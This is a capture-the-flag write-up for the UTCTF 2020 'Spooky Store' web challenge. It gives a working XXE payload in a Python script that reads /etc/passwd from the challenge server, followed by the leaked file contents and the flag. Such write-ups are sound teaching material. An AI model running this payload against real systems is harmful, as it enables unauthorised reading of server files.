Spooky Store [Web]
UTCTF 2020

spooky store

It's a simple webpage with 3 buttons, you got this :)

Solution

LFI via XXE, reading /etc/passwd:

import requests

data = """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE productId [<!ENTITY hax SYSTEM 'file:///etc/passwd'>]>
<locationCheck>
    <productId>&hax;</productId>
</locationCheck>
"""

response = requests.post('http://web1.utctf.live:5005/location', headers={
    'Content-Type': 'application/xml'}, data=data)
print(response.content)

Invalid ProductId: root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
utctf:x:1337:utflag{n3xt_y3ar_go1ng_bl1nd}

Flag

utflag{n3xt_y3ar_go1ng_bl1nd}